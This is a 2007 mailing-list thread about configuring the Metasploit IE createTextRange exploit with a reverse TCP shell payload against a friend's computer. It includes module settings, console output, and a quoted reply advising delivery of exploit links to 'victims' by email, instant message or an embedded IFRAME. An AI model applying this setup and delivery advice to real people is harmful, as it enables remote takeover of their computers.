[framework] Internet Explorer createTextRange() Code Execution

Rory Garton Smith eresemeth at gmail.com
Wed Apr 4 06:34:08 CDT 2007


Thank you all for responding so fast. I did what you said, however it didn't
quite work.

My friend and I were trying to exploit his computer this time, using the
same as before (windows/browser/ms06_013_createtextrange) with the payload
as (generic/shell_reverse_tcp). My local IP is 10.1.1.5, his router IP is
(for the sake of conversation) 124.181.130.145.

I set up the exploit so that:
SRVHOST - 10.1.1.5
SRVPORT - 49160 (A port I have forwarded from my router to my computer, which
          is 10.1.1.5 obviously)
LHOST - 124.181.130.145 (His IP)
LPORT - 5000 (A port he has forwarded from his router)

This exploit ran in the console and came out with the same as last time
[*] Started reverse handler
[*] Using URL: http://10.1.1.5:49160/PwPYpHE
[*] Server started.
[*] Exploit running as background job.

msf exploit(ms06_013_createtextrange) >


Upon this, I did as was suggested previously, and sent him the URL
http://10.1.1.5:49160/PwPYpHE and then opened it myself in Internet
Explorer, as did he. However, all that came up was a series of numbers
moving upwards towards 100. He has no firewalls on and neither do I. He was
using Internet Explorer 6, which is the target I was using as well.

I'm sure there is some critical error I made... perhaps confusing server and
host or similar? Any assistance would be wildly appreciated.
Thank you so much, sorry to trouble,
Erez

On 4/4/07, Donnie Werner <morning_wood at frame4.com> wrote:
>
> > All of the browser exploits work the same way -- you run the exploit,
> > the exploit creates a listening web server and a URL handler. To get code
> > execution, you need to send vulnerable clients to your web server. How
> > you do this depends on the situation, but the easiest way is to just
> > email or instant message the link to the victims.
>
> I have had very good success with client side exploits in Metasploit.
> My best results come from launching the exploit, creating a local HTML
> file pointing to the exploit server. Open file via browser, right click
> link and save as. What you have now is a standalone HTML file
> with all the code in it. Simply host this file or embed as an IFRAME,
> send your targets to your hosted file. Enjoy!
>
> This has worked nearly flawlessly, and there is no need to keep your
> MSF open, running, or listening.
>
> cheers,
> Donnie ( M.W ) Werner
> http://www.zone-h.org
>
>